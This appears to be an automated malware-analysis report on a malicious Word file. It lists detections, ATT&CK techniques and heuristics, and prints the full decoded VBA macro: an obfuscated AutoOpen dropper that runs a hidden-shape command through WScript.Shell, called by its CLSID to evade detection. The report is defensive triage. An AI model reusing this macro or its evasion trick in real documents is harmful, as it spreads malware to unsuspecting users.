MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1218.005 System Binary Proxy Execution: Mshta
T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on opening the document (AutoOpen). These macros utilize the dangerous COM object WScript.Shell to execute PowerShell commands. The script appears to be designed to download and execute a second-stage payload from a list of obfuscated URLs, indicating a downloader or droppper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6779192-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6779192-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5293 bytes |
SHA-256: 78fc72d9d284507f066b0106f647b2820db8fae4401ff31e83a5943d77e5146a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
110 of 178 identifiers look randomly generated (e.g. 'wIEaqKWmdfnQ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HXbEGlvJu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qbkOiN
Case 68375030
wwhRw = CBool(AGjGHml)
NtfrmsrU = 84320892
hUGcX = CBool(tTwTqZi)
Case 182965248
CkdEoYC = CBool(JNqjqaS)
clXkd = Atn(XiIMnn)
qnLDUk = CBool(OPYli)
zOjsDtfJO = Atn(263063334 * CLng(73465813))
End Select
On Error Resume Next
Select Case czHQI
Case 166725721
hszikLlr = CBool(cmiUXjT)
vrXinBw = 117412365
QddWKO = CBool(kOaUXd)
Case 270118713
JjFAZpivd = CBool(VQBHuqC)
QvHNGS = Atn(UkIGwHR)
cYGww = CBool(iliAupzMc)
jSKNtn = Atn(315809158 * CLng(169611293))
End Select
On Error Resume Next
Select Case aZmLS
Case 23331969
fTpGzrZfT = CBool(pRbsQkpvp)
ADbqnv = 175747867
aZPhqao = CBool(LIpmOVs)
Case 253360620
DlIKow = CBool(disbrz)
CQAFuf = Atn(aBEmZ)
FCFfLock = CBool(SOmcw)
HiMlM = Atn(272740918 * CLng(257945701))
End Select
Set PwGFdk = Shapes("wIEaqKWmdfnQ")
On Error Resume Next
Select Case vWcwh
Case 169456876
KRNXC = CBool(rtlzEVA)
SlvwEsb = 262111437
uSYlXKPSi = CBool(WwIzT)
Case 136223296
wktYsNod = CBool(ljAdhZW)
SEdnUi = Atn(iZMifJl)
bPvquZC = CBool(jHvYi)
Bawaph = Atn(95267664 * CLng(282738003))
End Select
kaPfk = "" + AEYNli + XtSAK + QAtjZKnM + hFUENkO + PwGFdk.TextFrame.TextRange.Text + opOzvROz + WfjEZIcY + rkhvO
On Error Resume Next
Select Case ralwiamES
Case 103999769
zMWQcKPWV = CBool(QQwPGCkPB)
WZADPq = 274745432
JAXBwv = CBool(LtAjbDzp)
Case 327071244
KmicXCo = CBool(BbZMTA)
VENVWPRD = Atn(uIkjaLWk)
cFDGh = CBool(wikzTGzZ)
zGwmU = Atn(176728640 * CLng(74010118))
End Select
On Error Resume Next
Select Case vUhus
Case 88728886
CMHtkT = CBool(zOokq)
sYtcNKRjv = 39666124
dhjaZiQw = CBool(ioOtDnLI)
Case 309266648
fNjwQWa = CBool(jhwbG)
UQDnh = Atn(kXnCHDK)
YawIo = CBool(aZwkQEz)
jPrHiIZ = Atn(258625567 * CLng(233788732))
End Select
On Error Resume Next
Select Case JlYJsA
Case 31432039
vTPsG = CBool(HSJWNsY)
PrCjKvLsK = 230496179
XmiGSuE = CBool(XZYSsLFq)
Case 262037486
FBUuLWjHL = CBool(JpCJjQjkd)
qbIGAY = Atn(ZJUFFXwFh)
cbHaL = CBool(OciXPlcc)
NcFdsN = Atn(296920009 * CLng(261259652))
End Select
On Error Resume Next
Select Case LzmfZzT
Case 262855450
iaWcVXia = CBool(MFXDpPlL)
MEAfScl = 163112288
plmXoL = CBool(wwXfstHIV)
Case 23239767
EHHWuOaH = CBool(iDIuqwFt)
zoQLMrQO = Atn(iSzsJOph)
KSqXzh = CBool(Mvqcpwo)
SYOVsv = Atn(108606244 * CLng(43866728))
End Select
Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq))
On Error Resume Next
Select Case krBTKrUF
Case 194695741
vNNfCYvb = CBool(EoVRW)
vFFmPrNi = 124189189
YIjjwKvr = CBool(LJshpzz)
Case 165465746
qwOaffOlO = CBool(Nqhiuw)
POrFuti = Atn(KiDXQmQSX)
WUzdBUKv = CBool(dfdazlL)
khkwDjiU = Atn(4037643 * CLng(78007216))
End Select
On Error Resume Next
Select Case WYwRaXkY
Case 25276366
wBFNjZAOX = CBool(AwOiTrjLs)
JILJUm = 18066899
okUvzQz = CBool(TFEcOwUIf)
Case 171130406
OwjoY = CBool(onppvtuW)
amiFzzk = Atn(YiHQAN)
DiucndEw = CBool(PIdHJXMJG)
VidaaMdiL = Atn(62051919 * CLng(114890501))
End Select
Const lGLXjE = 0
On Error Resume Next
Select Case wFctiSnY
Case 26204109
qNcMO = CBool(AVVIOYhbZ)
Iazth = 15729994
WECTE = CBool(NUubTT)
Case 119225001
KwqzQMG = CBool(YYAUaKM)
KXoJFIL = Atn(wDIoUzN)
HhziG = CBool(QpwwjiTkr)
HUQwf = Atn(59551597 * CLng(112995466))
End Select
oZAdYfdi.Run kaPfk, lGLXjE
On Error Resume Next
Select Case lLnAbE
Case 135102571
BXSMjJ = CBool(dHBbJirpA)
FPSRXr = 37736224
XDtuXsw = CBool(lXKfZN)
Case 63365356
bAYBrj = CBool(WmoWpBwif)
hJGwjj = Atn(fuwUi)
lrGDpWT = CBool(nrJXH)
VHMosiTs = Atn(28438263 * CLng(21514151))
End Select
On Error Resume Next
Select Case aACphzKYD
Case 1641119
AwlDuuPO = CBool(QoYSCNi)
XNjpNO = 40906173
ibvAFXpvI = CBool(murKY)
Case 78937904
Xalcj = CBool(TTzBqQzn)
fDPSTOWs = Atn(dJzakTMpX)
pnUXupbh = CBool(WziKQ)
PovGs = Atn(309619591 * CLng(9927627))
End Select
On Error Resume Next
Select Case QQbwObzrP
Case 65138532
jLIBIZDKM = CBool(lUzzTZqhq)
Bwthpckcj = 251331160
aVwrDajK = CBool(vctwfviw)
Case 311297369
HKZPq = CBool(SbMfoada)
LwwHQ = Atn(GXEwYDvCt)
mjfidAGIH = CBool(zXizUwSs)
zfqiCB = Atn(256402581 * CLng(138032789))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.